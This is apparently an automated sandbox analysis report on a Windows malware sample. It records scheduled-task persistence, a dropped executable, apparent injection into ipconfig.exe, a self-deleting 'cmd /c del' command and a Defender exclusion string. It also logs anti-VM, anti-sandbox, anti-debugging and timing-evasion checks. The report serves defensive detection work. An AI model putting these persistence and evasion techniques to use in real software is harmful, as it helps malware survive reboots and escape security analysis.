Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: 08917506_by_Libranalysis.exe Virustotal: Detection: 23%
Source: 08917506_by_Libranalysis.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File read: C:\Users\user\Desktop\08917506_by_Libranalysis.exe
Source: unknown Process created: C:\Users\user\Desktop\08917506_by_Libranalysis.exe 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe'
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Users\user\Desktop\08917506_by_Libranalysis.exe C:\Users\user\Desktop\08917506_by_Libranalysis.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: 08917506_by_Libranalysis.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: 08917506_by_Libranalysis.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 08917506_by_Libranalysis.exe, 00000005.00000002.295139182.0000000001550000.00000040.00000001.sdmp, ipconfig.exe, 0000000F.00000002.495544603.0000000000D30000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 08917506_by_Libranalysis.exe, ipconfig.exe
Source: Binary string: mscorrc.pdb source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_00FCB0BE push es; retf 0_2_00FCB4A3
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_00FCA8BA push es; retf 0_2_00FCB4A3
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_0311925D push ebx; retf 0_2_0311925E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03119260 push ebx; retf 0_2_03119262
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03118709 push ebx; retf 0_2_0311870A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_031177B0 push ebx; retf 0_2_031177B2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_031177AD push ebx; retf 0_2_031177AE
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03119C5D push ebx; retf 0_2_03119C5E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03119C60 push ebx; retf 0_2_03119C62
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041C97B push esp; ret 5_2_0041C97C
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041528B push ecx; retf 5_2_0041528D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004152B6 push eax; retf 5_2_004152B7
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B3F2 push eax; ret 5_2_0041B3F8
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B3FB push eax; ret 5_2_0041B462
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B3A5 push eax; ret 5_2_0041B3F8
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B45C push eax; ret 5_2_0041B462
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00B2B0BE push es; retf 5_2_00B2B4A3
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00B2A8D8 push es; retf 5_2_00B2B4A3
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015CD0D1 push ecx; ret 5_2_015CD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DAD0D1 push ecx; ret 15_2_00DAD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB8D0 push ebp; ret 15_2_003CB8D1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CC97B push esp; ret 15_2_003CC97C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C52B6 push eax; retf 15_2_003C52B7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C528B push ecx; retf 15_2_003C528D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB3A5 push eax; ret 15_2_003CB3F8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB3FB push eax; ret 15_2_003CB462
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB3F2 push eax; ret 15_2_003CB3F8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB45C push eax; ret 15_2_003CB462
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CBDD0 push cs; ret 15_2_003CBDD1
Source: initial sample Static PE information: section name: .text entropy: 7.64331504129

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Drops PE files
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File created: C:\Users\user\AppData\Roaming\OfCxSfBf.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp'

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 08917506_by_Libranalysis.exe PID: 1144, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000003B85E4 second address: 00000000003B85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000003B896E second address: 00000000003B8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004088A0 rdtsc 5_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe TID: 5612 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe TID: 5640 Thread sleep time: -99936s >= -30000s
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe TID: 5868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 5708 Thread sleep time: -55000s >= -30000s
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7140 Thread sleep time: -42000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread delayed: delay time: 99936
Source: explorer.exe, 00000007.00000000.277409479.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.277409479.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.270380927.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.277858693.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.277858693.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.267436007.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000007.00000000.277780603.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.277858693.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000007.00000000.277780603.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.273537437.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.270380927.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.270380927.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.270380927.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004088A0 rdtsc 5_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00409B10 LdrLoadDll, 5_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159B944 mov eax, dword ptr fs:[00000030h] 5_2_0159B944
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157B171 mov eax, dword ptr fs:[00000030h] 5_2_0157B171
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157C962 mov eax, dword ptr fs:[00000030h] 5_2_0157C962
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01579100 mov eax, dword ptr fs:[00000030h] 5_2_01579100
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A513A mov eax, dword ptr fs:[00000030h] 5_2_015A513A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01594120 mov eax, dword ptr fs:[00000030h] 5_2_01594120
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01594120 mov ecx, dword ptr fs:[00000030h] 5_2_01594120
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016041E8 mov eax, dword ptr fs:[00000030h] 5_2_016041E8
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0157B1E1
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016349A4 mov eax, dword ptr fs:[00000030h] 5_2_016349A4
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2990 mov eax, dword ptr fs:[00000030h] 5_2_015A2990
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159C182 mov eax, dword ptr fs:[00000030h] 5_2_0159C182
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AA185 mov eax, dword ptr fs:[00000030h] 5_2_015AA185
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F51BE mov eax, dword ptr fs:[00000030h] 5_2_015F51BE
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F69A6 mov eax, dword ptr fs:[00000030h] 5_2_015F69A6
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A61A0 mov eax, dword ptr fs:[00000030h] 5_2_015A61A0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01590050 mov eax, dword ptr fs:[00000030h] 5_2_01590050
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01632073 mov eax, dword ptr fs:[00000030h] 5_2_01632073
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01641074 mov eax, dword ptr fs:[00000030h] 5_2_01641074
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F7016 mov eax, dword ptr fs:[00000030h] 5_2_015F7016
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01644015 mov eax, dword ptr fs:[00000030h] 5_2_01644015
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158B02A mov eax, dword ptr fs:[00000030h] 5_2_0158B02A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A002D mov eax, dword ptr fs:[00000030h] 5_2_015A002D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0160B8D0 mov eax, dword ptr fs:[00000030h] 5_2_0160B8D0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0160B8D0 mov ecx, dword ptr fs:[00000030h] 5_2_0160B8D0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015740E1 mov eax, dword ptr fs:[00000030h] 5_2_015740E1
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015758EC mov eax, dword ptr fs:[00000030h] 5_2_015758EC
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01579080 mov eax, dword ptr fs:[00000030h] 5_2_01579080
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F3884 mov eax, dword ptr fs:[00000030h] 5_2_015F3884
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AF0BF mov ecx, dword ptr fs:[00000030h] 5_2_015AF0BF
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AF0BF mov eax, dword ptr fs:[00000030h] 5_2_015AF0BF
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B90AF mov eax, dword ptr fs:[00000030h] 5_2_015B90AF
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A20A0 mov eax, dword ptr fs:[00000030h] 5_2_015A20A0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157F358 mov eax, dword ptr fs:[00000030h] 5_2_0157F358
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157DB40 mov eax, dword ptr fs:[00000030h] 5_2_0157DB40
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A3B7A mov eax, dword ptr fs:[00000030h] 5_2_015A3B7A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157DB60 mov ecx, dword ptr fs:[00000030h] 5_2_0157DB60
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01648B58 mov eax, dword ptr fs:[00000030h] 5_2_01648B58
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163131B mov eax, dword ptr fs:[00000030h] 5_2_0163131B
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F53CA mov eax, dword ptr fs:[00000030h] 5_2_015F53CA
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159DBE9 mov eax, dword ptr fs:[00000030h] 5_2_0159DBE9
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A03E2 mov eax, dword ptr fs:[00000030h] 5_2_015A03E2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A03E2 mov eax, dword ptr fs:[00000030h] 5_2_015A03E2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A03E2 mov eax, dword ptr fs:[00000030h] 5_2_015A03E2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A03E2 mov eax, dword ptr fs:[00000030h] 5_2_015A03E2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A03E2 mov eax, dword ptr fs:[00000030h] 5_2_015A03E2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01645BA5 mov eax, dword ptr fs:[00000030h] 5_2_01645BA5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AB390 mov eax, dword ptr fs:[00000030h] 5_2_015AB390
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2397 mov eax, dword ptr fs:[00000030h] 5_2_015A2397
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01581B8F mov eax, dword ptr fs:[00000030h] 5_2_01581B8F
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01581B8F mov eax, dword ptr fs:[00000030h] 5_2_01581B8F
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0162D380 mov ecx, dword ptr fs:[00000030h] 5_2_0162D380
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163138A mov eax, dword ptr fs:[00000030h] 5_2_0163138A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A4BAD mov eax, dword ptr fs:[00000030h] 5_2_015A4BAD
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A4BAD mov eax, dword ptr fs:[00000030h] 5_2_015A4BAD
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A4BAD mov eax, dword ptr fs:[00000030h] 5_2_015A4BAD
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0162B260 mov eax, dword ptr fs:[00000030h] 5_2_0162B260
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0162B260 mov eax, dword ptr fs:[00000030h] 5_2_0162B260
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01648A62 mov eax, dword ptr fs:[00000030h] 5_2_01648A62
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01579240 mov eax, dword ptr fs:[00000030h] 5_2_01579240
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01579240 mov eax, dword ptr fs:[00000030h] 5_2_01579240
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01579240 mov eax, dword ptr fs:[00000030h] 5_2_01579240
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01579240 mov eax, dword ptr fs:[00000030h] 5_2_01579240
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B927A mov eax, dword ptr fs:[00000030h] 5_2_015B927A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163EA55 mov eax, dword ptr fs:[00000030h] 5_2_0163EA55
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01604257 mov eax, dword ptr fs:[00000030h] 5_2_01604257
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157AA16 mov eax, dword ptr fs:[00000030h] 5_2_0157AA16
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157AA16 mov eax, dword ptr fs:[00000030h] 5_2_0157AA16
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01593A1C mov eax, dword ptr fs:[00000030h] 5_2_01593A1C
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01575210 mov eax, dword ptr fs:[00000030h] 5_2_01575210
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01575210 mov ecx, dword ptr fs:[00000030h] 5_2_01575210
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01575210 mov eax, dword ptr fs:[00000030h] 5_2_01575210
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01575210 mov eax, dword ptr fs:[00000030h] 5_2_01575210
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01588A0A mov eax, dword ptr fs:[00000030h] 5_2_01588A0A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159A229 mov eax, dword ptr fs:[00000030h] 5_2_0159A229
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159A229 mov eax, dword ptr fs:[00000030h] 5_2_0159A229
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159A229 mov eax, dword ptr fs:[00000030h] 5_2_0159A229
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159A229 mov eax, dword ptr fs:[00000030h] 5_2_0159A229
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159A229 mov eax, dword ptr fs:[00000030h] 5_2_0159A229
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159A229 mov eax, dword ptr fs:[00000030h] 5_2_0159A229
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159A229 mov eax, dword ptr fs:[00000030h] 5_2_0159A229
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159A229 mov eax, dword ptr fs:[00000030h] 5_2_0159A229
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159A229 mov eax, dword ptr fs:[00000030h] 5_2_0159A229
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163AA16 mov eax, dword ptr fs:[00000030h] 5_2_0163AA16
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163AA16 mov eax, dword ptr fs:[00000030h] 5_2_0163AA16
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B4A2C mov eax, dword ptr fs:[00000030h] 5_2_015B4A2C
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B4A2C mov eax, dword ptr fs:[00000030h] 5_2_015B4A2C
